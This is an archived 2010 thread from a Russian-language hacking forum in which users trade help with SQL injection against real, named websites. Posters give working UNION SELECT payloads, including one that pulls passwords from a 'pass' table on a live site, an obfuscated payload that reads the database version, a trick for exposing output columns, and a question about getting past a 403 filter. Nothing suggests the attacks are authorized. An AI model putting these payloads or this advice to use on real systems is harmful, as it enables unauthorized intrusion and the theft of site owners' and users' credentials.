ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.07.2010, 01:32
|
|
Новичок
Регистрация: 22.08.2009
Сообщений: 7
Провел на форуме:
23465
Репутация:
1
|
|
Может кто нибудь на примере объяснить?
У формы action="?page=reg"
2 поля
допустим
login
pass
В логин я пишу 123
В пасс - 1 UNION ..........
Вывод есть у 4,5 и 6-го поля.
Как правильно вбить параметры в программу?
и где proxy вписывать, а то не нашел?
+ допустим точно знаю, что есть таблицы users и news
|
|
|
14.07.2010, 10:21
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
website is vulnerable
sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1
i use command order by and i got 23 columns but when i paste link in browser like this
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
page load normally and i can not see printable field
can help me what i am doing mistake
|
|
|
|
14.07.2010, 10:30
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
*.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
try to put(deliver) -
*.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
|
|
|
|
14.07.2010, 10:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от linuxkernal
linuxkernal said:
website is vulnerable
sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1
i use command order by and i got 23 columns but when i paste link in browser like this
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
page load normally and i can not see printable field
can help me what i am doing mistake
это русскоязычный форум и здесь очень мало народа понимает что вы писали, следующий раз используйте онлайн транслиты или ваш пост будет удален.
-------
linuxkernel this is a russian board forum,and most of guys can't understand what u posted here,next time use online translators or your post will be deleted
|
|
|
|
14.07.2010, 12:37
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...
|
|
|
|
14.07.2010, 12:45
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
вы издеваетесь что ли? я же написал выше, не писать на английском!!!!
linuxkernel и все кто хочет задавать такие вопросы ` hackforums.net, вам туда
Сообщение от winstrool
winstrool said:
Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...
для этих целей используют SIPT
|
|
|
|
14.07.2010, 14:55
|
|
Новичок
Регистрация: 24.01.2009
Сообщений: 10
Провел на форуме:
72528
Репутация:
1
|
|
Прошу помощи:
Нашел вроде скуль:
_http://dovidka.if.ua/rubric.php?id=86'
Но не могу подобрать колонки? в чем проблема?
|
|
|
|
14.07.2010, 15:02
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от boberko
boberko said:
Прошу помощи:
Нашел вроде скуль:
_http://dovidka.if.ua/rubric.php?id=86'
Но не могу подобрать колонки? в чем проблема?
http://dovidka.if.ua/rubric.php?id=-86+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7
|
|
|
|
14.07.2010, 15:15
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
Код:
Code:
http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass
помогите подобрать логин плз |
|
|
|
14.07.2010, 17:36
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1
Ошибка 403.
А вот так:
Код:
Code:
http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+
Работает.
Как обойти? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
